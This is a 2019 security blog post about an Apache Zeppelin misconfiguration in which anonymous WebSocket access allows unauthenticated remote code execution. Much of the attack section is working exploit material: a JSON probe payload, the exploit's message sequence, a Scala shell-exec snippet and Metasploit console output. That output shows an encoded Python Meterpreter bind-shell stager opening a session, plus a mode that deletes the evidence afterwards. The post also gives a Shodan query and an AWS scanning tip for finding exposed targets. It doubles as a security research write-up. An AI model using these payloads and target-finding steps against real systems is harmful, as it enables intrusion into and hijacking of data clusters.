<!doctype html>
<html lang="en">
	<head>
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<title>Apache Zeppelin Vulnerability + Metasploit</title>
		<meta name="description" content="I am writing about my experiences as a naval navel-gazer.">
		<link rel="alternate" href="/feed/feed.xml" type="application/atom+xml" title="ℬ㏒.㎈ℓℯℛ.ⓧⓨℤ">
		<link rel="alternate" href="/feed/feed.json" type="application/json" title="ℬ㏒.㎈ℓℯℛ.ⓧⓨℤ">
		
		<style>/**
 * okaidia theme for JavaScript, CSS and HTML
 * Loosely based on Monokai textmate theme by http://www.monokai.nl/
 * @author ocodia
 */

code[class*="language-"],
pre[class*="language-"] {
	color: #f8f8f2;
	background: none;
	text-shadow: 0 1px rgba(0, 0, 0, 0.3);
	font-family: Consolas, Monaco, 'Andale Mono', 'Ubuntu Mono', monospace;
	font-size: 1em;
	text-align: left;
	white-space: pre;
	word-spacing: normal;
	word-break: normal;
	word-wrap: normal;
	line-height: 1.5;

	-moz-tab-size: 4;
	-o-tab-size: 4;
	tab-size: 4;

	-webkit-hyphens: none;
	-moz-hyphens: none;
	-ms-hyphens: none;
	hyphens: none;
}

/* Code blocks */
pre[class*="language-"] {
	padding: 1em;
	margin: .5em 0;
	overflow: auto;
	border-radius: 0.3em;
}

:not(pre) > code[class*="language-"],
pre[class*="language-"] {
	background: #272822;
}

/* Inline code */
:not(pre) > code[class*="language-"] {
	padding: .1em;
	border-radius: .3em;
	white-space: normal;
}

.token.comment,
.token.prolog,
.token.doctype,
.token.cdata {
	color: #8292a2;
}

.token.punctuation {
	color: #f8f8f2;
}

.token.namespace {
	opacity: .7;
}

.token.property,
.token.tag,
.token.constant,
.token.symbol,
.token.deleted {
	color: #f92672;
}

.token.boolean,
.token.number {
	color: #ae81ff;
}

.token.selector,
.token.attr-name,
.token.string,
.token.char,
.token.builtin,
.token.inserted {
	color: #a6e22e;
}

.token.operator,
.token.entity,
.token.url,
.language-css .token.string,
.style .token.string,
.token.variable {
	color: #f8f8f2;
}

.token.atrule,
.token.attr-value,
.token.function,
.token.class-name {
	color: #e6db74;
}

.token.keyword {
	color: #66d9ef;
}

.token.regex,
.token.important {
	color: #fd971f;
}

.token.important,
.token.bold {
	font-weight: bold;
}
.token.italic {
	font-style: italic;
}

.token.entity {
	cursor: help;
}
/*
 * New diff- syntax
 */

pre[class*="language-diff-"] {
	--eleventy-code-padding: 1.25em;
	padding-left: var(--eleventy-code-padding);
	padding-right: var(--eleventy-code-padding);
}
.token.deleted {
	background-color: hsl(0, 51%, 37%);
	color: inherit;
}
.token.inserted {
	background-color: hsl(126, 31%, 39%);
	color: inherit;
}

/* Make the + and - characters unselectable for copy/paste */
.token.prefix.unchanged,
.token.prefix.inserted,
.token.prefix.deleted {
	-webkit-user-select: none;
	user-select: none;
	display: inline-flex;
	align-items: center;
	justify-content: center;
	padding-top: 2px;
	padding-bottom: 2px;
}
.token.prefix.inserted,
.token.prefix.deleted {
	width: var(--eleventy-code-padding);
	background-color: rgba(0,0,0,.2);
}

/* Optional: full-width background color */
.token.inserted:not(.prefix),
.token.deleted:not(.prefix) {
	display: block;
	margin-left: calc(-1 * var(--eleventy-code-padding));
	margin-right: calc(-1 * var(--eleventy-code-padding));
	text-decoration: none; /* override del, ins, mark defaults */
	color: inherit; /* override del, ins, mark defaults */
}
* { box-sizing: border-box; }
/* Defaults */
:root {
	--font-family: -apple-system, system-ui, sans-serif;
	--font-family-monospace: Consolas, Menlo, Monaco, Andale Mono WT, Andale Mono, Lucida Console, Lucida Sans Typewriter, DejaVu Sans Mono, Bitstream Vera Sans Mono, Liberation Mono, Nimbus Mono L, Courier New, Courier, monospace;
}

/* Theme colors */
:root {
	--color-gray-20: #e0e0e0;
	--color-gray-50: #C0C0C0;
	--color-gray-90: #333;

	--background-color: #fff;

	--text-color: var(--color-gray-90);
	--text-color-link: #082840;
	--text-color-link-active: #5f2b48;
	--text-color-link-visited: #17050F;

	--syntax-tab-size: 2;

	--pinyin-font: 'Arima Madurai';
}

@media (prefers-color-scheme: dark) {
	:root {
		--color-gray-20: #e0e0e0;
		--color-gray-50: #C0C0C0;
		--color-gray-90: #dad8d8;

		/* --text-color is assigned to --color-gray-_ above */
		--text-color-link: #1493fb;
		--text-color-link-active: #6969f7;
		--text-color-link-visited: #a6a6f8;

		--background-color: #15202b;
	}
}


/* Global stylesheet */
* {
	box-sizing: border-box;
}

html,
body {
	padding: 0;
	margin: 0 auto;
	font-family: var(--font-family);
	color: var(--text-color);
	background-color: var(--background-color);
}
html {
	overflow-y: scroll;
}
body {
	max-width: 55em;
}

/* https://www.a11yproject.com/posts/how-to-hide-content/ */
.visually-hidden {
	clip: rect(0 0 0 0);
	clip-path: inset(50%);
	height: 1px;
	overflow: hidden;
	position: absolute;
	white-space: nowrap;
	width: 1px;
}

p:last-child {
	margin-bottom: 0;
}
p {
	line-height: 1.5;
}

li {
	line-height: 1.5;
}

a[href] {
	color: var(--text-color-link);
}
a[href]:visited {
	color: var(--text-color-link-visited);
}
a[href]:hover,
a[href]:active {
	color: var(--text-color-link-active);
}

main {
	padding: 1rem;
}
main :first-child {
	margin-top: 0;
}

header {
	border-bottom: 1px dashed var(--color-gray-20);
}
header:after {
	content: "";
	display: table;
	clear: both;
}

.links-nextprev {
	list-style: none;
	border-top: 1px dashed var(--color-gray-20);
	padding: 1em 0;
}

table {
	margin: 1em 0;
}
table td,
table th {
	padding-right: 1em;
}

pre,
code {
	font-family: var(--font-family-monospace);
}
pre:not([class*="language-"]) {
	margin: .5em 0;
	line-height: 1.375; /* 22px /16 */
	-moz-tab-size: var(--syntax-tab-size);
	-o-tab-size: var(--syntax-tab-size);
	tab-size: var(--syntax-tab-size);
	-webkit-hyphens: none;
	-ms-hyphens: none;
	hyphens: none;
	direction: ltr;
	text-align: left;
	white-space: pre;
	word-spacing: normal;
	word-break: normal;
}
code {
	word-break: break-all;
}
p > code {
	color: #722;
	text-decoration: underline #7222;
}

/* Header */
header {
	display: flex;
	gap: 1em .5em;
	flex-wrap: wrap;
	align-items: center;
	padding: 1em;
}
.home-link {
	font-size: 1em; /* 16px /16 */
	font-weight: 700;
	margin-right: 2em;
}
.home-link:link:not(:hover) {
	text-decoration: none;
}

/* Nav */
.nav {
	display: flex;
	padding: 0;
	margin: 0;
	list-style: none;
}
.nav-item {
	display: inline-block;
	margin-right: 1em;
}
.nav-item a[href]:not(:hover) {
	text-decoration: none;
}
.nav a[href][aria-current="page"] {
	text-decoration: underline;
}

/* Posts list */
.postlist {
	list-style: none;
	padding: 0;
	padding-left: 1.5rem;
}
.postlist-item {
	display: flex;
	flex-wrap: wrap;
	align-items: baseline;
	counter-increment: start-from -1;
	margin-bottom: 1em;
}
.postlist-item:before {
	display: inline-block;
	pointer-events: none;
	content: "" counter(start-from, decimal-leading-zero) ". ";
	line-height: 100%;
	text-align: right;
	margin-left: -1.5rem;
}
.postlist-date,
.postlist-item:before {
	font-size: 0.8125em; /* 13px /16 */
	color: var(--color-gray-90);
}
.postlist-date {
	word-spacing: -0.5px;
}
.postlist-link {
	font-size: 1.1875em; /* 19px /16 */
	font-weight: 700;
	flex-basis: calc(100% - 1.5rem);
	padding-left: .25em;
	padding-right: .5em;
	text-underline-position: from-font;
	text-underline-offset: 0;
	text-decoration-thickness: 1px;
}
.postlist-item-active .postlist-link {
	font-weight: bold;
}

/* Tags */
.post-tag {
	display: inline-flex;
	align-items: center;
	justify-content: center;
	text-transform: capitalize;
	font-style: italic;
}
.postlist-item > .post-tag {
	align-self: center;
}

/* Tags list */
.post-metadata {
	display: inline-flex;
	flex-wrap: wrap;
	gap: .5em;
	list-style: none;
	padding: 0;
	margin: 0;
}
.post-metadata time {
	margin-right: 1em;
}

/* Direct Links / Markdown Headers */
.header-anchor {
	text-decoration: none;
	font-style: normal;
	font-size: 1em;
	margin-left: .1em;
}
a[href].header-anchor,
a[href].header-anchor:visited {
	color: transparent;
}
a[href].header-anchor:focus,
a[href].header-anchor:hover {
	text-decoration: underline;
}
a[href].header-anchor:focus,
:hover > a[href].header-anchor {
	color: #aaa;
}

h2 + .header-anchor {
	font-size: 1.5em;
}

.pyin {
	font-family: var(--pinyin-font), cursive;
}

figure {
	margin: -1.7em 0 0.7em 0;
}

figcaption {
	font-style: italic;
}

figure img {
	border: 1px solid #ccc;
}</style>
		<link href="https://fonts.googleapis.com/css2?family=Arima+Madurai:wght@400;700" rel="stylesheet" referrerpolicy="no-referrer">
	</head>
	<body>
		<a href="#skip" class="visually-hidden">Skip to main content</a>

		<header>
			<a href="/" class="home-link">ℬ㏒.㎈ℓℯℛ.ⓧⓨℤ</a>
			<nav>
				<h2 class="visually-hidden">Top level navigation menu</h2>
				<ul class="nav">
					<li class="nav-item"><a href="/">Home</a></li>
					<li class="nav-item"><a href="/blog/">Archive</a></li>
					<li class="nav-item"><a href="/about/">About Me</a></li>
				</ul>
			</nav>
		</header>

		<main id="skip">
			
<h1>Apache Zeppelin Vulnerability + Metasploit</h1>

<ul class="post-metadata">
	<li><time datetime="2019-05-10">2019年05月</time></li>
	<li><a href="/tags/research/" class="post-tag">research</a>, </li>
	<li><a href="/tags/metasploit/" class="post-tag">metasploit</a>, </li>
	<li><a href="/tags/security/" class="post-tag">security</a></li>
</ul>

<p><a href="https://zeppelin.apache.org">Apache Zeppelin</a> is a &quot;Web-based notebook that enables data-driven, interactive data analytics and collaborative documents...&quot; which is very similar to Jupyter notebook. Notebook servers offer polyglot Remote Code Execution (RCE) by design, so gaining access to one would make pwning the entire Hadoop cluster and all its data fairly simple.</p>
<p>‌<figure><picture><source type="image/avif" srcset="/img/OZZgOqPmzF-1200.avif 1200w"><source type="image/webp" srcset="/img/OZZgOqPmzF-1200.webp 1200w"><img alt="How would you like your RCE?" loading="lazy" decoding="async" src="/img/OZZgOqPmzF-1200.png" width="1200" height="885"></picture><figcaption>How would you like your RCE?</figcaption></figure></p>
<p>It's interesting because AWS Elastic MapReduce (EMR) Hadoop clusters and the like tend to have it installed, so it's becoming quite prevalent among data-science teams who may not be security trained.</p>
<p>From a honeypot EMR cluster with all ports exposed to the internet, I found it takes about 6 minutes before the YARN ResourceManager on port 8088 is found by scanners. YARN allows commands to be submitted via a REST API, which will then be scheduled to run on the cluster. Run-of-the-mill Mirai-variant malware was downloaded and the cluster nodes were recruited to take part in DDoS attacks. They weren't super successful as they kept hitting the memory limits and getting killed, but still tried to send a lot of UDP traffic.</p>
<p>Moral of the story: Don't expose your EMR clusters to the internet as pretty much every port except SSH either leaks data or allows unauthenticated RCE.</p>
<h2 id="but-anyway-onto-zeppelin" tabindex="-1">But anyway, onto Zeppelin. <a class="header-anchor" href="#but-anyway-onto-zeppelin">#</a></h2>
<p>By default it's completely unauthenticated, but I assume people who want to expose it publicly will turn on the inbuilt authentication. Which is fine if they follow the <a href="http://zeppelin.apache.org/docs/0.8.0/setup/security/shiro_authentication.html">instructions</a>. However, there are two steps:</p>
<ol>
<li>
<p><strong>Enable Apache Shiro authentication</strong>. Basically modifying the provided template <code>conf/shiro.ini</code> config file and entering some plaintext usernames and passwords. You can alternatively configure LDAP / AD.</p>
</li>
<li>
<p><strong>Secure the Websocket channel</strong>. Set <code>zeppelin.anonymous.allowed</code> to <code>false</code> in <code>conf/zeppelin-site.xml</code>.
You will then need to be logged in and retrieve a ticket from <code>/api/security/ticket</code> before using the WebSocket.</p>
</li>
</ol>
<p>It seems that a widespread misconfiguration is to perform only step 1.
After step 1, it looks from the web interface as if Zeppelin is sufficiently secure.
You will see a Login button in the top-right corner, and you won't be able to see any of the notebooks <strong>through the web interface</strong> until you login.</p>
<p>‌<figure><picture><source type="image/avif" srcset="/img/014M4eaYq8-1200.avif 1200w"><source type="image/webp" srcset="/img/014M4eaYq8-1200.webp 1200w"><img alt="Everything looks secure" loading="lazy" decoding="async" src="/img/014M4eaYq8-1200.png" width="1200" height="488"></picture><figcaption>Everything looks secure</figcaption></figure></p>
<p>However, the WebSocket's xml config still has anonymous access allowed, which gives complete control.</p>
<p>You can check for this, by sending the following payload to the Websocket at <code>/ws</code>:</p>
<pre class="language-json" tabindex="0"><code class="language-json"><span class="token punctuation">{</span><span class="token property">"op"</span><span class="token operator">:</span><span class="token string">"LIST_CONFIGURATIONS"</span><span class="token punctuation">,</span><span class="token property">"principal"</span><span class="token operator">:</span><span class="token string">"anonymous"</span><span class="token punctuation">,</span><span class="token property">"ticket"</span><span class="token operator">:</span><span class="token string">"anonymous"</span><span class="token punctuation">,</span><span class="token property">"roles"</span><span class="token operator">:</span><span class="token string">"[]"</span><span class="token punctuation">}</span></code></pre>
<p>If you get a response, the service is vulnerable.</p>
<h2 id="is-this-a-common-misconfiguration" tabindex="-1">Is this a common misconfiguration? <a class="header-anchor" href="#is-this-a-common-misconfiguration">#</a></h2>
<p>The shodan search <a href="https://www.shodan.io/search?query=zeppelin+%22WITHOUT+WARRANTIES+OR+CONDITIONS%22">zeppelin &quot;WITHOUT WARRANTIES OR CONDITIONS&quot;</a> should find Apache Zeppelin instances. I only found one which wasn't vulnerable. Scanning the AWS IP range on a plausible port (8890) will find more temporary instances backed by EMR clusters.</p>
<h2 id="how-the-exploit-works" tabindex="-1">How the exploit works <a class="header-anchor" href="#how-the-exploit-works">#</a></h2>
<ol>
<li>Send op <code>NEW_NOTE</code></li>
<li>Wait for <code>NEW_NOTE</code> response with note ID</li>
<li>Send <code>INSERT_PARAGRAPH</code></li>
<li>Wait for <code>PARAGRAPH_ADDED</code> with paragraph ID</li>
<li>Send <code>RUN_PARAGRAPH</code> with the payload and language</li>
<li>Receive polling updates with status: PENDING, RUNNING, FINISHED, ERROR.</li>
</ol>
<p>There are a load of different interpreters. The datascience interpreters might not have been configured though, so the simplest will be to use python or sh to get a shell.</p>
<p>There do exist systems where only the spark interpreter is available. In that case, script kiddies will have to learn scala!</p>
<p>‌<figure><picture><source type="image/avif" srcset="/img/gCitzip4Ey-1200.avif 1200w"><source type="image/webp" srcset="/img/gCitzip4Ey-1200.webp 1200w"><img alt="Poor script kiddie can't figure out how to mine monero" loading="lazy" decoding="async" src="/img/gCitzip4Ey-1200.png" width="1200" height="581"></picture><figcaption>Poor script kiddie can't figure out how to mine monero</figcaption></figure></p>
<h2 id="run-shell-commands-from-scala" tabindex="-1">Run shell commands from scala <a class="header-anchor" href="#run-shell-commands-from-scala">#</a></h2>
<pre class="language-scala" tabindex="0"><code class="language-scala"><span class="token keyword">import</span> <span class="token namespace">scala<span class="token punctuation">.</span>sys<span class="token punctuation">.</span>process<span class="token punctuation">.</span></span>_
print<span class="token punctuation">(</span><span class="token string">"ps waxf"</span> <span class="token operator">!</span><span class="token operator">!</span><span class="token punctuation">)</span></code></pre>
<p>Scala is such a messed up language.</p>
<h2 id="metasploit" tabindex="-1">Metasploit <a class="header-anchor" href="#metasploit">#</a></h2>
<p>I thought this would be a good time to finally learn how to write a Metasploit module.</p>
<p>We have a <code>check</code> command which tells you if a service is vulnerable</p>
<pre class="language-text" tabindex="0"><code class="language-text">msf5 exploit(ws) > set rhosts 10.8.3.3
rhosts => 10.8.3.3
msf5 exploit(ws) > set rport 1234
rport => 1234
msf5 exploit(ws) > check

[+] 10.8.3.3:1234 - WebSocket 10.8.3.3:1234/ws connected
[*] 10.8.3.3:1234 - Interpreters: spark,md,angular,sh,livy,alluxio,file,psql,flink,python,ignite,lens,cassandra,geode,kylin,elasticsearch,scalding,jdbc,hbase,bigquery,beam,pig,scio,groovy,neo4j
[+] 10.8.3.3:1234 - The target is vulnerable.</code></pre>
<p>And then an <code>exploit</code> command which takes a payload (here a staged Meterpreter bind shell), executes it and gets a shell.</p>
<pre class="language-text" tabindex="0"><code class="language-text">msf5 exploit(ws) > set payload python/meterpreter/bind_tcp
payload => python/meterpreter/bind_tcp
msf5 exploit(ws) > exploit

[+] 10.8.3.3:1234 - WebSocket 10.8.3.3:1234/ws connected
[+] 10.8.3.3:1234 - Created note 2EB1RJQH9 wyhuqCxyHpGT
[+] 10.8.3.3:1234 - Created paragraph 20190511-183457_1324276293
[*] 10.8.3.3:1234 - PENDING
[*] 10.8.3.3:1234 - RUNNING
[*] 10.8.3.3:1234 - {"op":"PARAGRAPH","data":{"paragraph":{"text":"import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKYj1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpiLmJpbmQoKCcwLjAuMC4wJyw0NDQ0KSkKYi5saXN0ZW4oMSkKcyxhPWIuYWNjZXB0KCkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==')))","user":"anonymous","dateUpdated":"2019-05-11T18:35:00+0000","config":{"colWidth":12.0,"editorMode":"ace/mode/python","fontSize":9.0,"enabled":true,"results":{},"editorSetting":{"language":"python","editOnDblClick":false,"completionSupport":true}},"settings":{"params":{},"forms":{}},"apps":[],"jobName":"paragraph_1557599697676_1276214488","id":"20190511-183457_1324276293","dateCreated":"2019-05-11T18:34:57+0000","dateStarted":"2019-05-11T18:35:00+0000","status":"RUNNING","errorMessage":"","progressUpdateIntervalMs":500}},"ticket":"anonymous","principal":"anonymous","roles":""}
[*] Started bind TCP handler against 10.8.3.3:4444
[*] Sending stage (53770 bytes) to 10.8.3.3
[*] Meterpreter session 4 opened (10.0.2.15:34617 -> 10.8.3.3:4444) at 2019-05-11 14:22:06 -0400</code></pre>
<p>Another mode is to send a specific command and wait for it to <code>COMPLETE</code>. It will then sneakily delete the evidence.</p>
<pre class="language-text" tabindex="0"><code class="language-text">msf5 exploit(ws) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Python payload
   1   Command payload

msf5 exploit(ws) > set target 1
target => 1
msf5 exploit(ws) > set payload generic/custom
payload => generic/custom
msf5 exploit(ws) > set COMPLETE true
COMPLETE => true
msf5 exploit(ws) > set payloadstr "ps aux"
payloadstr => ps aux
msf5 exploit(ws) > exploit

[+] 10.8.3.3:1234 - WebSocket 10.8.3.3:1234/ws connected
[+] 10.8.3.3:1234 - Created note 2EATUUSED QFgMcsIJSQzHvGbENw
[+] 10.8.3.3:1234 - Created paragraph 20190511-231105_1295465714
[*] 10.8.3.3:1234 - PENDING
[*] 10.8.3.3:1234 - FINISHED
[+] 10.8.3.3:1234 - USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   4364    12 ?        Ss   18:26   0:00 /usr/bin/tini -- bin/zeppelin.sh
root         6  0.3  5.2 4671604 420016 ?      Sl   18:26   1:00 /usr/lib/jvm/java-8-openjdk-amd64/bin/java -Dfile.encoding=UTF-8 -Xms1024m -Xmx1024m -XX:MaxPermSize=512m -Dlog4j.configuration=file:///zeppelin/conf/log4j.properties -Dzeppelin.log.file=/zeppelin/logs/zeppelin--04c5df9b52d5.log -cp ::/zeppelin/lib/interpreter/*:/zeppelin/lib/*:/zeppelin/*::/zeppelin/conf org.apache.zeppelin.server.ZeppelinServer
root        84  0.0  0.0  19764   168 ?        S    18:29   0:00 /bin/bash /zeppelin/bin/interpreter.sh -d /zeppelin/interpreter/python -c 172.17.0.2 -p 35004 -r : -l /zeppelin/local-repo/python -g python
...snip...
root       295  0.0  0.4 594692 38996 ?        Ssl  18:35   0:03 /opt/conda/bin/python -m ipykernel_launcher -f /tmp/tmpMJSdvG.json
root       310  0.0  0.0  19904   784 pts/1    Ss+  18:40   0:00 bash
root       367  0.0  0.0  36084  3112 ?        R    23:11   0:00 ps aux

[*] 10.8.3.3:1234 - Deleting note 2EATUUSED QFgMcsIJSQzHvGbENw
[*] Exploit completed, but no session was created.</code></pre>
<p>It's quite fun. I did find the process of writing a module annoying as I didn't find the documentation or examples sufficient.</p>
<p>In the case of a shell session, I might only want to delete the note after I've finished with the session. Really I just want a separate command which takes a notebook ID and deletes it in case of error. However, I wasn't sure how to do that. Maybe it would require writing an auxiliary module? Or maybe this just shows the limitation of Metasploit exploits if the task isn't just a plug-and-play shell.</p>
<p>Since I don't think you can add a ruby gem to a module without forking metasploit, I cobbled together a ruby websockets client based on code from <a href="https://blog.pusher.com/websockets-from-scratch/">Pusher blog</a>. Fun. To be honest, I might have been better off writing my own code outside Metasploit, but it's good for me to understand how the module system works. Since WebSockets work cross-origin, it could even be a webpage where you input the host and port.</p>
<p>Anyway, module code is available as a <a href="https://gist.github.com/bcaller/4f667ffddc23642b1017a1b8f2a7172c">Gist: apache_zeppelin_websocket.rb</a>. To install put it in <code>.msf4/modules/exploits/</code>. Don't use it for evil.</p>
<h2 id="update-play-around" tabindex="-1">Update: Play around <a class="header-anchor" href="#update-play-around">#</a></h2>
<p>I set some challenges including a vulnerable Zeppelin for a CTF. You can run a local copy to play around: <a href="https://github.com/bcaller/sectalks-lon0x24-ctf/tree/master/hindenburger"><img alt=":octocat:" src="https://github.githubassets.com/images/icons/emoji/octocat.png?v8" style="max-width: 1em; max-height: 1em; display: inline-block;">bcaller/sectalks-lon0x24-ctf</a></p>

<ul class="links-nextprev"><li>Previous: <a href="/your-s3-buckets-are-leaking/">Your S3 buckets are leaking</a></li><li>Next: <a href="/big-data-lake-big-data-leak/">Big Data Lake, Big Data Leak</a></li>
</ul>

		</main>

		<footer></footer>

		<!-- Current page: /apache-zeppelin-vulnerability-metasploit/ -->
	</body>
</html>
